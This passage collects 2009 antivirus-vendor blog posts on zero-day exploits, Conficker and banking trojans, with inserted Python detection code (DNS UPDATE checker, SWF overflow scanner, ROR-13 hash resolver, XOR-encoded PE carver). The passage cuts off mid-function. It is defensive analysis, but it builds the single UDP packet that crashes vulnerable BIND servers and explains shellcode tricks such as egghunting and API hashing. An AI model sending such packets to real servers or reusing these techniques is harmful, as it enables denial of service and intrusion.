The vulnerability exists in the handling of DNS dynamic-update request messages. Dynamic update (RFC 2136) was added to DNS to cope with constantly changing DNS records across various DNS servers. Individual DNS servers can send update messages back to the DNS zone master so that the master record remains current. Each update message should contain at least a zone record, a prerequisite record, and an update record. The zone record specifies which zone the update message is for; only the zone master can update the record for itself. The prerequisite record specifies the condition the server should check before updating, and the update record contains the updated record.

An example configuration of a set of DNS servers for a particular zone.

The vulnerability reported yesterday exists due to improper handling of a specially crafted DNS dynamic-update query. Two conditions must be met for the packet to trigger the vulnerability: the victim’s DNS server must be the master of the zone specified in the update query packet, and the update query packet must contain a prerequisite record of type ANY. ANY is not expected in a resource record because it is defined only as a question type. The victim’s DNS server cannot handle this condition and shuts itself down. An attacker can cause a denial of service on a vulnerable DNS server with just one UDP packet. In fact, the attack succeeds even if dynamic update is disabled on the victim’s DNS server.
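The two conditions above translate directly into a signature-style check of the kind an IDS or a DNS front end would apply to inbound UPDATE messages. The following is an added example (not ISC’s or McAfee’s code): it parses the DNS header, the zone section and the prerequisite section, and flags a type-ANY prerequisite for a zone this server masters. One caveat beyond the post: RFC 2136 itself uses CLASS=ANY/TYPE=ANY (“name is in use”) and CLASS=NONE/TYPE=ANY (“name is not in use”) as legitimate prerequisites, so the reason string reports the class to let an operator tune the rule. The packet builder only produces constructed test vectors; zone names are placeholders.

```python
import struct
from typing import Set, Tuple

OPCODE_UPDATE = 5            # RFC 2136 opcode
TYPE_SOA = 6
TYPE_ANY = 255
CLASS_ANY, CLASS_NONE = 255, 254


def _read_name(msg: bytes, off: int) -> Tuple[str, int]:
    """Decode a possibly compressed domain name; return (name, offset after it)."""
    labels, end, hops = [], None, 0
    while True:
        if off >= len(msg):
            raise ValueError("truncated name")
        ln = msg[off]
        if ln & 0xC0 == 0xC0:                      # compression pointer
            if end is None:
                end = off + 2                      # the name ends after the first pointer
            off = struct.unpack_from("!H", msg, off)[0] & 0x3FFF
            hops += 1
            if hops > 64:
                raise ValueError("pointer loop")
            continue
        off += 1
        if ln == 0:
            break
        labels.append(msg[off:off + ln].decode("ascii", "replace"))
        off += ln
    return ".".join(labels) + ".", (end if end is not None else off)


def check_update(msg: bytes, master_zones: Set[str]) -> Tuple[bool, str]:
    """Flag the condition the post describes: an UPDATE for a zone this server
    masters whose prerequisite section carries a type-ANY record."""
    if len(msg) < 12:
        return False, "short message"
    _id, flags, zocount, prcount, _upcount, _adcount = struct.unpack_from("!6H", msg, 0)
    if (flags >> 11) & 0xF != OPCODE_UPDATE:
        return False, "not an UPDATE"
    off, zones = 12, []
    for _ in range(zocount):                       # zone section: name, type, class
        name, off = _read_name(msg, off)
        _ztype, _zclass = struct.unpack_from("!HH", msg, off)
        off += 4
        zones.append(name.lower())
    if not any(z in master_zones for z in zones):
        return False, "not master for zone(s) %s" % zones
    for _ in range(prcount):                       # prerequisite section: full RRs
        name, off = _read_name(msg, off)
        rtype, rclass, _ttl, rdlen = struct.unpack_from("!HHIH", msg, off)
        off += 10 + rdlen
        if rtype == TYPE_ANY:
            kind = "RFC-shaped" if rclass in (CLASS_ANY, CLASS_NONE) else "non-RFC"
            return True, "prerequisite %s has type ANY (class %d, %s)" % (name, rclass, kind)
    return False, "no type-ANY prerequisite"


def _wire_name(name: str) -> bytes:
    return b"".join(bytes([len(l)]) + l.encode("ascii")
                    for l in name.strip(".").split(".") if l) + b"\x00"


def build_update(zone: str, prereq_type: int, prereq_class: int) -> bytes:
    """Constructed test vector: header, one zone entry (SOA/IN) and one
    prerequisite RR with empty RDATA whose owner name is a compression
    pointer back to the zone name at offset 12."""
    hdr = struct.pack("!6H", 0x1234, OPCODE_UPDATE << 11, 1, 1, 0, 0)
    zone_sec = _wire_name(zone) + struct.pack("!HH", TYPE_SOA, 1)
    prereq = struct.pack("!H", 0xC000 | 12) + struct.pack("!HHIH", prereq_type, prereq_class, 0, 0)
    return hdr + zone_sec + prereq


if __name__ == "__main__":
    masters = {"example.test."}                    # placeholder zone
    for pkt in (build_update("example.test.", TYPE_ANY, 1),
                build_update("example.test.", TYPE_SOA, 1),
                build_update("other.test.", TYPE_ANY, 1)):
        print(check_update(pkt, masters))
```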

Patches are available from ISC for BIND Versions 9.4.3-P3, 9.5.1-P3, and 9.6.1-P1. Users and administrators should apply these patches immediately because the exploit is public.

McAfee Network Security Platform detects this attack using the signature set released on July 30 with the signature “DNS: ISC BIND 9 Dynamic Update Denial-of-Service Vulnerability.”

New Zero-Day Attacks Use PDF Documents

As we already mentioned multiple times in the past, exploits that take advantage of newly discovered holes in popular applications represent a growing threat to Internet users. Many, if not most, computer systems are vulnerable to these attacks. More evidence shows zero-day attacks remain the preferred choice of cybercriminals.

Today, a new unpatched Adobe vulnerability has been discovered in the wild. It takes advantage of a new feature for adding interactive Flash (SWF) content to PDF files. This bug was found to affect at least Adobe Reader and Acrobat 9.1.2, as well as Adobe Flash Player 9 or later.

In our investigation of the issue, we found that Acrobat 9 introduced a new “Rich Media” annotation type, which uses Acrobat’s built-in Flash Player to play SWF content. In the current attack, specially crafted SWF files were embedded into PDF documents. These can cause Adobe Reader to execute arbitrary code when viewed. When successful, shellcode in the exploit is executed by Adobe Reader. The picture below depicts how the shellcode works and what it does:

Shellcode created by FWS

It first gets a KERNEL32.dll image base using the Windows PEB structure, sets up the required Windows APIs, then decrypts and executes its malware payload. This specific malicious PDF file contains three embedded executables encoded using a simple 1-byte XOR key. When run, it drops a file called SUCHOST.EXE and sends the information gathered from the infected machine to a free host-redirection service based in China:

  • [blocked].3322.org
  • [blocked].2288.org

The victim is then redirected to other malicious IP address(es). This malware acts as a backdoor to allow remote access to the infected computer.

According to Adobe, the Rich Media annotation is new to Acrobat 9.x and will not be understood by PDF document viewers that can support only up to Acrobat 8 specifications. Thus, if you place the SWF file with Acrobat 9 into the PDF files, it is not readable by Acrobat or Adobe Reader 8 and older versions, and will not be vulnerable to this attack.

Although details of this vulnerability have not yet become public, more attackers are likely to take advantage of this weakness. For McAfee customers, both the PDF and its associated payload can be proactively detected as “Exploit-PDF.t” since the 5683 DATs (released July 21).

Even though anti-malware vendors continue to add detection for new zero-day threats, there are several things you can do to mitigate such risks. Refrain from opening attachments from untrusted sources and visiting untrustworthy web sites.

This bug is currently being investigated by the Adobe Product Security Incident Response Team.

(Thanks to Abhishek Karnik and Aditya Kapoor for helping to analyze the malware.)


New Wave Of Web Attacks Exploits Office

Today, Microsoft released a security advisory on active in-the-wild attacks using a vulnerability in Microsoft Office Web Components. Computers with Microsoft Office features that use vulnerable versions of the Office Web Components could be infected with malware when browsing malicious websites in Internet Explorer.

From our investigation, Exploit-CVE2009-1136, a new 0-day exploit, was added to the web exploit toolkits that had widely distributed Exploit-MSDirectShow.b on hijacked websites in China just the previous week. Since the start of this new wave of attacks, new trojans installed by Exploit-CVE2009-1136 have been detected by Artemis technology, which also allows us to get a global view of the spread of this new threat.

In one of the new trojan samples used by Exploit-CVE2009-1136, we first saw Artemis queries coming from China at 11:53 GMT on July 13th, 2009. We didn’t have automatic protection for this at that point, but the various systems analyzing the threat details soon marked it as malicious.

By now, this sample has spread to many other Internet users in China, and has been queried and blocked by Artemis more than 328 times at more than 145 unique IP addresses (ISP, not end point).

[Figure: Artemis queries]

Besides China, we only saw Artemis queries coming from Virus Total (Spain) and fellow malware researchers in the UK and Germany in small numbers.

We will post more information as we receive it.

Network Security Defeats Microsoft Video ActiveX Exploit

As a follow-up to our two recent blogs, we want to provide some details for this zero-day exploit from the perspective of the McAfee Network Security Platform (formerly known as IntruShield).

Unlike traditional ActiveX exploits, in this case the Microsoft Video ActiveX controls are being used to load malicious image files and trigger the vulnerability. McAfee Network Security Platform detects this exploit attempt using the attack signature HTTP: Vulnerability in Microsoft Video ActiveX Control Could Allow Remote Code Execution. At this point, we have seen active attempts in the wild trying to exploit this vulnerability. Figure 1, below, shows one such attempt as viewed on the Alert Viewer and Figure 2, bottom, shows the corresponding packet capture from the evidence report.

Figure 1. Exploit attempt alert

Figure 2. Packet capture from evidence report

Microsoft Security Advisory 972890 says customers can set the kill bit for a bunch of Class Identifiers. Any attempt to use these Class Identifiers for exploitation can be detected using the audit signatures HTTP: Potential Harmful Microsoft Video ActiveX Control I, HTTP: Potential Harmful Microsoft Video ActiveX Control II, and HTTP: Potential Harmful Microsoft Video ActiveX Control III.

All of the attack signatures described above were released on July 6 in the following network security signature sets.
• 5.1.22.14
• 4.1.52.14

SWF Flash Exploits: Old Wine in a New Bottle

Adobe Flash applications have been a major security concern during the past couple of years. The large number of Flash vulnerabilities published, coupled with its popularity and wide distribution, makes Flash files an attractive target for cybercriminals. Infected banner ads are not new; these Flash-based “malvertisements” have plagued ad servers and popular websites for a very long time.

A malicious Flash file can be crafted to contain an image or an animation to fool unsuspecting users into believing the file is legitimate. Lately, we have observed a spike in the number of websites hosting malicious flash files that exploit the integer-overflow vulnerability in the DefineSceneAndFrameLabelData tag. These are popularly known as Exploit-CVE2007-0071.

Although the vulnerability has been fixed for some time, the bad guys are always coming up with new and progressive mechanisms to evade detection.

Flash Player 9 and later come with a new virtual machine called ActionScript Virtual Machine 2 (AVM2), which is designed to execute programs written in the ActionScript 3.0 language. ActionScript 3.0 supports a native method called loadBytes().

The flash.display.Loader class supports the loadBytes method, which takes a byte array to fill the loader with data. The bytes injected can be in the form of GIF, JPG, PNG, or SWF files. Embedding the vulnerable SWF (small web format) file inside the loader provides attackers the multifold advantage of ensuring successful exploitation while complicating the analysis for researchers.

The image above shows the embedded malicious SWF file inside the loader file. This loader uses the loadBytes method to inject the bytes into the security context of the application.

In recent versions of the exploit, the embedded SWF file is encrypted using various obfuscation techniques such as byte-shifting algorithms or random XOR keys, as shown in the figure below.
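A tag-level check for the DefineSceneAndFrameLabelData overflow described above, as an added example that is not code from the original post: it walks the SWF tag list (decompressing CWS files first), reads the tag’s SceneCount and flags a count that cannot fit inside the tag, which is how the CVE-2007-0071 files look on disk. The sample SWF files are constructed inline; note that a loader wrapping the vulnerable SWF via loadBytes() hides it from this check unless the inner bytes are carved out first.

```python
import struct
import zlib

DEFINE_SCENE_AND_FRAME_LABEL_DATA = 86   # SWF tag code (constant name is ours, value per the SWF spec)


def decode_swf(data: bytes) -> bytes:
    """Return the uncompressed SWF (header + tags); accepts FWS and zlib-compressed CWS files."""
    sig = data[:3]
    if sig == b"FWS":
        return data
    if sig == b"CWS":
        # The first 8 bytes (signature, version, file length) are stored uncompressed.
        return b"FWS" + data[3:8] + zlib.decompress(data[8:])
    raise ValueError("not an SWF, signature %r" % sig)


def read_encoded_u32(buf: bytes, pos: int):
    """SWF EncodedU32: 7 payload bits per byte, LSB first, high bit set = more bytes follow."""
    value, shift = 0, 0
    for _ in range(5):                        # the spec caps the encoding at 5 bytes
        b = buf[pos]
        pos += 1
        value |= (b & 0x7F) << shift
        if not b & 0x80:
            break
        shift += 7
    return value & 0xFFFFFFFF, pos


def iter_tags(body: bytes):
    """Yield (tag_code, tag_body) for each tag in an uncompressed SWF."""
    nbits = body[8] >> 3                      # frame RECT: 5-bit field width, then 4 fields
    rect_len = (5 + 4 * nbits + 7) // 8       # RECT is padded to a whole byte
    pos = 8 + rect_len + 2 + 2                # skip frame rate (u16) and frame count (u16)
    while pos + 2 <= len(body):
        code_and_len = struct.unpack_from("<H", body, pos)[0]
        pos += 2
        code, length = code_and_len >> 6, code_and_len & 0x3F
        if length == 0x3F:                    # long form: real length follows as u32
            length = struct.unpack_from("<I", body, pos)[0]
            pos += 4
        yield code, body[pos:pos + length]
        pos += length
        if code == 0:                         # End tag
            break


def find_suspicious_scene_counts(swf: bytes):
    """Return [(scene_count, tag_length)] for each tag 86 whose SceneCount cannot fit in the tag."""
    hits = []
    for code, tag in iter_tags(decode_swf(swf)):
        if code != DEFINE_SCENE_AND_FRAME_LABEL_DATA:
            continue
        scene_count, pos = read_encoded_u32(tag, 0)
        # Each scene needs at least a 1-byte EncodedU32 offset and a 1-byte (empty,
        # NUL-terminated) name, so a SceneCount above (remaining bytes // 2) can only be
        # there to overflow the size computation, which is the CVE-2007-0071 pattern.
        if scene_count > (len(tag) - pos) // 2:
            hits.append((scene_count, len(tag)))
    return hits


def encode_u32(v: int) -> bytes:
    """Inverse of read_encoded_u32, used to construct the sample files."""
    out = bytearray()
    while True:
        b = v & 0x7F
        v >>= 7
        if v:
            out.append(b | 0x80)
        else:
            out.append(b)
            return bytes(out)


def build_swf(scene_count: int) -> bytes:
    """Constructed minimal FWS file: one tag 86 with the given SceneCount and one scene, then End."""
    tag_body = encode_u32(scene_count) + encode_u32(0) + b"a\x00" + encode_u32(0)
    tag = struct.pack("<H", (DEFINE_SCENE_AND_FRAME_LABEL_DATA << 6) | len(tag_body)) + tag_body
    end_tag = struct.pack("<H", 0)
    body = b"\x00" + struct.pack("<HH", 0x1800, 1) + tag + end_tag   # RECT nbits=0, 24 fps, 1 frame
    return b"FWS" + bytes([9]) + struct.pack("<I", 8 + len(body)) + body


def compress_swf(fws: bytes) -> bytes:
    """Constructed helper: the same file as a zlib-compressed CWS, to exercise decode_swf."""
    return b"CWS" + fws[3:8] + zlib.compress(fws[8:])


if __name__ == "__main__":
    print(find_suspicious_scene_counts(build_swf(1)))
    print(find_suspicious_scene_counts(compress_swf(build_swf(0xFFFFFFFF))))
```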

We expect this trend to continue as cybercriminals target low-hanging fruit such as applications, and Flash is no exception. As always, make sure you are protected and that Flash Player is updated to the latest version. Happy surfing. :)

An Artemis View of Zero-Day Attacks

In our blog from yesterday, we described how Exploit-MSDirectShow.b has been widely deployed on hijacked websites in China, targeting Internet Explorer users. When a victim browses one of these sites, malware is downloaded to the computer. To better understand the current impact of these attacks, we have monitored the prevalence of its downloaded malware through Artemis.

Since yesterday, our Artemis technology has detected new malware installed by Exploit-MSDirectShow.b that was targeted to certain geographical regions of the world.

In China, a new sample variant was queried by Artemis more than 180 times at more than 70 unique IP addresses (ISP, not end point) over a 24-hour period. This is represented by the many red dots in the following figure:

[Figure: Artemis queries]

This particular sample was first seen only in mainland China, but we soon saw Artemis queries from Korea, Japan, Australia, Singapore, Taiwan, and the United States in very small numbers. As we know, the web has no boundaries, and the potential risks of the DirectShow zero-day vulnerability are not limited to specific languages or regions. We will closely monitor this trend.

This sample is already heuristically detected in the DATs and Artemis. After our analysis, it has now been classified as Downloader-BRT Trojan.

McAfee Coverage of the DirectShow Exploit

Since we reported about the new attacks against Internet Explorer exploiting a vulnerability in a DirectShow ActiveX object, we have released DATs/coverage updates for many of our products and technologies.

Current status for each of the content areas:

  • Malware: Coverage is provided for exploit code in the 5668 DATs, released on July 6
  • HIPS: Generic buffer overflow should provide coverage
  • McAfee Network Security Platform: Coverage was provided on July 6
  • McAfee Vulnerability Manager: Coverage was provided on July 6
  • MNAC: Coverage will be provided in the next release
  • VirusScan Enterprise: Buffer overflow protection should provide coverage
  • McAfee Web Gateway, Anti-Malware Edition: Behavior analysis provides coverage against currently known exploits

Other Internet users and website administrators can also download the free Stinger tool to scan computers and web pages for known malware relating to this attack:

We will continue to monitor the situation to provide comprehensive coverage.

New Attacks Against Internet Explorer

If you read Geok Meng and Xiaobo’s blog published in December last year, this must almost seem like a movie sequel. Over the July 4 weekend, an exploit targeting a zero-day vulnerability in the Microsoft DirectShow ActiveX object was discovered on many Chinese websites.

At the time of research, over a hundred hijacked sites were found to be injected with malicious links that are still actively hosting this Trojan. Many of these sites are what you and I would not consider “malicious” or “dodgy.” For example, some of them are school websites or the local community club’s website that had been hijacked or infected.

When browsing these sites (hijacked site #1), the victim is hyperlinked to hijacked site #2, which seems to act as a proxy. In this case, if someone were to audit the source code of hijacked site #1, he or she would see that the links are connected to sites that look legitimate. Hijacked site #2 is, subsequently, hyperlinked to a malicious site hosting a web exploit toolkit.

During research, one of the things we found interesting was that the web exploit toolkit explicitly checks that the origin of the hyperlinked references does not come from the “.gov.cn” and “.edu.cn” domains, which are used by Chinese government and education sites, respectively. If the references do not come from either of these domains, it starts sending a cocktail of exploits including:

  • Exploit-MSDirectShow.b (zero-day)
  • Exploit-XMLhttp.d
  • Exploit-RealPlay.a
  • JS/Exploit-BBar
  • Exploit-MS06-014

Each of these exploits targets a different application that could be vulnerable–Internet Explorer 6 and 7, DirectShow ActiveX, RealPlayer, Baidu Toolbar–that can be accessed via the Internet Explorer browser.

From past investigations, this toolkit has been widely used on many Chinese hijacked sites this year. The attackers may be trying to avoid or delay attention from the Chinese government.

When successful, the attacker installs a downloader Trojan that could download other malware.

This zero-day vulnerability has been verified to affect at least Windows XP systems with Internet Explorer 6.x and 7.x. However, in IE 7 on Windows Vista, risky ActiveX objects are blocked by default, which may mitigate this zero-day attack. Users should ensure that their systems are always kept up to date against the older exploits.

The zero-day exploit will be detected as Exploit-MSDirectShow.b by McAfee VirusScan in today’s 5668 DATs. The downloader Trojan installed by this exploit can be proactively detected as Generic.dx since the 5567 DATs (released March 28).

We will post more information as we receive it.

(Thanks to our colleague Wei Wang for assistance in this analysis.)

Dumb Malware Authors Cause More Damage Than Smart Ones

I don’t really know which is worse: a dumb or a smart malware writer.

Brazilian malware writers fall into the first category: bad coders and dumb. It’s as simple as that.

While checking a very recent PWS-Banker Trojan (the malware that steals banking information), I came across a variant. This one targets three Brazilian banks–Bradesco, Itau, and Real–to steal the basic information: bank account, branch office, user, password, and paper token info.

Next this malware sends the information to a remote SQL database. Nothing new to see here because password-stealing trojans have been around for several years, but what struck me in this case is that the malware author didn’t think about protecting the information he gathered (stole), since all the credentials to access the remote database are hardcoded inside the malware.

Provider=SQLOLEDB.1;Password=XXXXXX;Persist Security Info=True;User ID=YYYYY;Initial Catalog=YYYYY;Data Source=sql.[removed].com.br;Packet Size=10000

What does this mean? It was bad enough that someone gained access to the victims’ bank info, but now any person who checks the malware can also have access to that data! And by “checking” I do not mean it requires any reverse engineering.

Yes, it is just another password-stealing Trojan. No need to get too excited. :) And, yes, we already detect this malware–as PWS-Banker.gen.i.

New McAfee Whitepaper on Browser Attacks

Today we at McAfee Avert Labs released an excellent paper on browser attacks. Written by Christoph Alme, this paper deals with the many complexities of browser security and attacks. From the paper:

Web Browsers: An Emerging Platform Under Attack
“The widespread use of highly interactive “rich client” web applications for e-commerce, business networking, and online collaboration has finally catapulted web browsers from straightforward HTML viewers to a full-blown software platform. And as corporate users are performing a significant portion of their work on the web, whether it’s researching or collaborating, the safety of the underlying platform is critical to the company’s success.”

Other areas the paper covers include:

• The shift in spam to mainly malicious web link usage

• “Web 2.0” sites—whether weblogs, social networking or portal sites—are increasingly spammed with links to malicious sites

• Legitimate sites are compromised and misused to either host malicious code or link to a malicious website

• Use of malicious video banners placed in advertisement networks

• Use of popular search terms to advertise and drive (search query) traffic to a malicious website. In a recent case in Germany, attackers used Google AdWords to attract users who searched for “flash player” to the attacker’s fake Adobe-look-alike site

Download the paper in its entirety here.

Urban ‘Attack’ on Infrastructure

Supervisory Control and Data Acquisition, or SCADA, refers to large-scale distributed remote processing systems that gather data in real time to control critical industrial, infrastructure, or facility processes and equipment. SCADA is used in power plants as well as in oil and gas refining, telecommunications, transportation, and water and waste control.

Stories about intruders who damage the power grid or any other key SCADA infrastructure frequently make the headlines. In the past, as in Mexico in 2007, extraterrestrial creatures and flying saucers were occasionally blamed.

Since then, our enemies have changed. The Wall Street Journal reported in April that a federal audit had found critical infrastructure facilities in the U.S. power industry compromised with software that would allow the attackers to disable key elements of the national power grid. “The Chinese have attempted to map our infrastructure, such as the electrical grid,” a senior U.S. intelligence official said at the time. One year ago, the CIA claimed that a cyberattack had caused a multicity power outage at an unspecified location outside the United States. The CIA story broke on May 14. It’s rumored that Hydro-Quebec was also a target of cyberspies.

Last week, I discovered a video posted on YouTube in November 2008.
We can see two guys hacking a central light system and then playing Space Invaders on it!

I have some doubts about the technical aspects of these light-show “attacks” on unprepared buildings. But fake or not, the video confirms that hackers and cybercriminals have got their eyes on SCADA networks. Perhaps the first demo was just for fun, but the others will have less juvenile goals. An attack can involve nationwide damage, a terrible effect on the public’s morale, and huge financial losses. Modern SCADA networks are more vulnerable than ever because they use open networking standards (such as TCP/IP), are now deployed on less secure operating systems (Windows), are connected to other networks (including the Internet), and cannot be easily updated and rebooted.

For SCADA, which typically allows only a closely defined list of applications to run, a security approach that includes whitelisting can be a good solution. McAfee’s recent acquisition of Solidcore will help our customers in this area.

Hacking Exposed at RSA

RSA is pretty much over now and it has been a blurry several days. Some real good sessions, some real good panels. Lots of meetings and interviews and many old friends on hand (shoutouts to Dave Perry, Larry Bridwell, and Lysa Myers), but I digress. …

For me the best event was the “Hacking Exposed” session, by Stuart McClure and George Kurtz. OK, I cop to being biased because I know and work with both these gents/slackers at McAfee, but they did show a really wild hack–they pwned a primary domain controller from an iPhone! Yep, you read that correctly. They hacked a Windows server FROM an iPhone.

For those who were not among the anointed who attended, I have uploaded the slide deck here. Stu and George recorded the hack as well:

Conficker on the prowl after the 1st…

So April 1st came and went, and it seemed that all might be right in the post-Conficker world…

Of course, nothing is that easy. With the latest activity, there is also a continual flood of information out there. Below, I have attempted to aggregate the new functionality.

Around April 7th/8th Conficker started to move again. Our peers were able to confirm this new update functionality.

When it did wake, it used the peer-to-peer (P2P) communication channel to call home rather than the HTTP rendezvous to start its latest escapade. In this case, the infected host is contacted initially by another host over an ad-hoc P2P connection, kind of like an alarm clock. Then, after hitting the snooze button for a period of several hours, the communication begins again, starting this time from the infected host.

Conficker is definitely not in any rush to tango. Communication is done in such a manner that this traffic (aka the update) may go unseen, or at least mostly under the radar, by using fragmented and irregular UDP communication.

So what happens next? When this P2P communication stream ends, our host is basically told to go to a domain and download a file. This is when TCP comes into play. Our infected host goes out to an address and an encrypted executable file is downloaded. Once executed, it could contain malware such as the ever-changing FakeAlert or even Waledac. So at the end of this round, we may be left looking at something similar to the below screenshots:

We have also seen some hosts serving up a Waledac payload. (Realistically, it may contain anything that the bad guys are serving up on those domains.)

These downloads are detected as FakeAlert-SpywareProtect and Waledac.gen.b respectively.

Also downloaded as part of the payload, we again have the MS08-067-like “hot” patch. This time, however, it is closer to the original patch, so as to elude detection. (Note: our McAfee Conficker Detection tool is in the process of being redesigned to allow detection of the latest variants.)

There are also two other notes of interest. The first is that we have a new deadline to watch: on May 3rd this latest variant is set to expire.

Thinking aloud, this point brings some interesting questions to mind. Is this just a test from the Conficker crew, who are serving up Waledac incidentally? Or is this done for other self-serving reasons (i.e., attention diversion)? Maybe it’s just a deadline for a rented botnet? These are interesting questions that I am sure the security community at large is wondering about.

Second, when an infected host resolves an HTTP rendezvous domain name, it compares the resolved IP with the list of IPs it has already queried; if the new IP is in the list, it moves on to the next domain in its list.

Of course, we will update if anything else comes along…

Drive-by-Download Du Jour

LuckySploit is an exploit framework that’s been in the news recently. As drive-by-downloads go, it lurks behind iframes and foists malware upon unsuspecting users.

One LuckySploit attack we analyzed downloaded the FakeAlert-BY Trojan. So if you visited a Web site today then saw this…

[Figure: FakeAlert-BY]

… then you are, unfortunately, infected with FakeAlert-BY, and possibly thanks to LuckySploit.

We detect the LuckySploit downloader as JS/Downloader-BNL in the 5580 DATs, to be released on April 10. We’ve had detection for FakeAlert-BY since the 5545 DATs, released on March 6.

Please update your AV signatures and stay secure!

New Conficker Variant

McAfee Avert Labs has received a new variant of the infamous Conficker worm. Like the previous variants, this one also spreads using the MS08-067 vulnerability in Microsoft Windows Server Service. But unlike the previous variants, which arrived as a Windows DLL file, this variant seems to arrive as an .EXE file.

Detection for this variant of the worm will be available as W32/Conficker.worm.gen.d from the upcoming 5579 DAT release. Users of McAfee Artemis Technology are already protected in real time against this threat.

We have also updated our stand-alone cleaning tool–Stinger–to detect and clean this variant.

More information on this variant of the Conficker worm is available here. McAfee’s coverage and protection for the MS08-067 vulnerability, is available here.

For measures to protect yourself and your organization against Conficker, please visit:

We will continue to monitor this threat in our labs, and will update our blog with any new findings.

Happy Easter: Egg-Hunting With New PowerPoint Zero-Day Exploit

As a follow-up to my colleagues’ blog post about the newest Office exploits, here is an analysis of one of the Microsoft PowerPoint zero-day exploits that once again are being used in targeted attacks to infect victims with a trojan horse. The malicious presentation files abuse a new, still unpatched hole in Microsoft PowerPoint and cause it to execute code planted by the attackers. This blog post shows how the shellcode works and what it does right after an innocent victim opens the malicious file, if the attacker gets their way, of course!

For size reasons, the code is split into several parts that are scattered throughout the malicious PowerPoint file. Part one of the shellcode consists of an “egghunter”, which is used to locate the remaining part of the shellcode in memory. To do that, it first sets up an exception handler that prevents crashes when accessing bad memory locations, then goes on a hunt for the shellcode’s prepended egg (0xD1CF11E0). Once that egg (a marker for the beginning of the shellcode’s second part) is found in memory, code execution is transferred to the code following it.

Part two of the shellcode begins with a loop that looks for a writable memory block of at least 1KB in size (starting at address 0x30000000). Another loop then XOR decodes another part of the shellcode into that memory location and branches to it. Once decoded, a filename (“fssm32.exe”) can be seen in the disassembly. In order to either download or drop a second-stage executable, shellcode needs access to operating system API functions. The ones it needs are going to be imported by parsing OS internal structures, such as the Process Environment Block, to locate kernel32.dll, then parsing the library’s PE header to locate the desired function pointers.

As shellcode usually needs to fit into a size-limited block of memory, this piece of exploit not only has its code split into several parts for it to work reliably, it also uses 32-bit hashes of the API functions it imports, rather than a list of function names, which would consume more space. The shellcode’s ROR-13 hashing algorithm iterates over every exported API function name and compares the result against its given list at run time. Applying the same technique when statically analyzing the shellcode, the list of imported functions becomes readable. The now-readable list does not contain any function that would indicate the shellcode downloads a file; rather, it drops an embedded one from the PowerPoint file and executes it.
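The analyst side of the ROR-13 technique, as an added example rather than the post’s own script: hashing a list of export names the same way the shellcode does and mapping the hashes it carries back to names. The export list is a constructed subset of kernel32.dll, and the exact hash variant (no module-name prefix, NUL terminator optional) is an assumption; real shellcode differs in these details.

```python
MASK32 = 0xFFFFFFFF


def ror32(value: int, count: int) -> int:
    """Rotate a 32-bit value right by count bits (what the x86 ROR instruction does on EDI)."""
    count %= 32
    return ((value >> count) | (value << (32 - count))) & MASK32


def ror13_hash(name: str, include_nul: bool = False) -> int:
    """h = ror13(h) + byte for every byte of the export name (optionally its NUL terminator too).
    Assumed variant: start at 0, no module-name prefix; other shellcode families differ here."""
    data = name.encode("ascii") + (b"\x00" if include_nul else b"")
    h = 0
    for b in data:
        h = (ror32(h, 13) + b) & MASK32
    return h


# Constructed subset of kernel32.dll export names; a real run walks the whole export
# table of the library the shellcode resolves (kernel32.dll, found via the PEB).
KERNEL32_EXPORTS = [
    "LoadLibraryA", "GetProcAddress", "WinExec", "ExitProcess", "CreateFileA",
    "WriteFile", "ReadFile", "CloseHandle", "VirtualAlloc", "VirtualProtect",
    "GetTempPathA", "CreateProcessA", "GetModuleHandleA",
]


def build_hash_table(exports, include_nul=False):
    """Map hash -> name once, so a whole list of shellcode hashes resolves in O(1) each."""
    return {ror13_hash(n, include_nul): n for n in exports}


def resolve_hashes(hashes, exports=KERNEL32_EXPORTS):
    """Return {hash: name or None}, trying the no-NUL variant first, then the NUL variant."""
    plain = build_hash_table(exports, include_nul=False)
    with_nul = build_hash_table(exports, include_nul=True)
    return {h: plain.get(h) or with_nul.get(h) for h in hashes}


def classify_intent(resolved):
    """Triage like the post's reading of the list: download-capable, or drop-and-execute only?"""
    names = {n for n in resolved.values() if n}
    downloader = bool(names & {"URLDownloadToFileA", "InternetOpenA", "InternetReadFile"})
    dropper = bool(names & {"CreateFileA", "WriteFile"}) and bool(names & {"WinExec", "CreateProcessA"})
    return {"download": downloader, "drop_and_execute": dropper}


if __name__ == "__main__":
    # Constructed hash list in the style of what is carved out of the shellcode's import table.
    sample = [ror13_hash(n) for n in ("LoadLibraryA", "GetProcAddress", "CreateFileA", "WriteFile", "WinExec")]
    sample.append(0xDEADBEEF)   # constructed: a hash of something outside our small export list
    resolved = resolve_hashes(sample)
    for h, n in resolved.items():
        print("0x%08X -> %s" % (h, n or "<unresolved>"))
    print(classify_intent(resolved))
```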

Using a hex-search for typical indicators of an executable file, such as an “MZ” or “PE” header doesn’t yield any feasible results – which is not astonishing at all. Of course, the attackers responsible for having built the exploit intended to prevent their cover being blown by something as obvious as an executable that is embedded into a PowerPoint presentation file! By looking more closely at the shellcode, there is another suspicious XOR-decoding loop.

The loop decrypts a given memory block using an 8-bit XOR key. By incorporating the same decryption loop into a Python script and applying it to the PowerPoint file (see screenshot below), both an MZ and a PE header surface in the hex editor. It’s the embedded executable that was assumed to be hiding between the PowerPoint “slides”; the malware can finally be extracted.
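The decryption loop turned into a scanner, as an added example that is not the post’s script: it derives a single-byte XOR key from a candidate “MZ” and confirms it with the PE signature at e_lfanew, so it also covers the 1-byte-XOR embedded executables of the PDF dropper discussed earlier. The carrier “document” and the header-only PE image are constructed inline.

```python
import struct


def xor_bytes(data: bytes, key: int) -> bytes:
    """Apply a single-byte XOR key (key 0 is a no-op, i.e. plaintext)."""
    return bytes(b ^ key for b in data)


def looks_like_pe(buf: bytes, offset: int, key: int) -> bool:
    """Decode only what is needed at offset to check 'MZ', e_lfanew and 'PE\\0\\0'."""
    if offset + 0x40 > len(buf):
        return False
    if xor_bytes(buf[offset:offset + 2], key) != b"MZ":
        return False
    e_lfanew = struct.unpack("<I", xor_bytes(buf[offset + 0x3C:offset + 0x40], key))[0]
    # A real DOS header points at the PE header within a few KB; anything else is a
    # stray 'MZ' (or a decoy) and must not be reported.
    if e_lfanew < 0x40 or e_lfanew > 0x1000 or offset + e_lfanew + 4 > len(buf):
        return False
    return xor_bytes(buf[offset + e_lfanew:offset + e_lfanew + 4], key) == b"PE\x00\x00"


def find_xor_encoded_pes(buf: bytes):
    """Return [(offset, key)] for every single-byte-XOR-encoded PE image in buf.
    Instead of trying all 256 keys at every offset, the key is derived from the byte
    that would have to decode to 'M' and then confirmed by the rest of the header."""
    hits = []
    for off in range(len(buf) - 0x40):
        key = buf[off] ^ ord("M")
        if looks_like_pe(buf, off, key):
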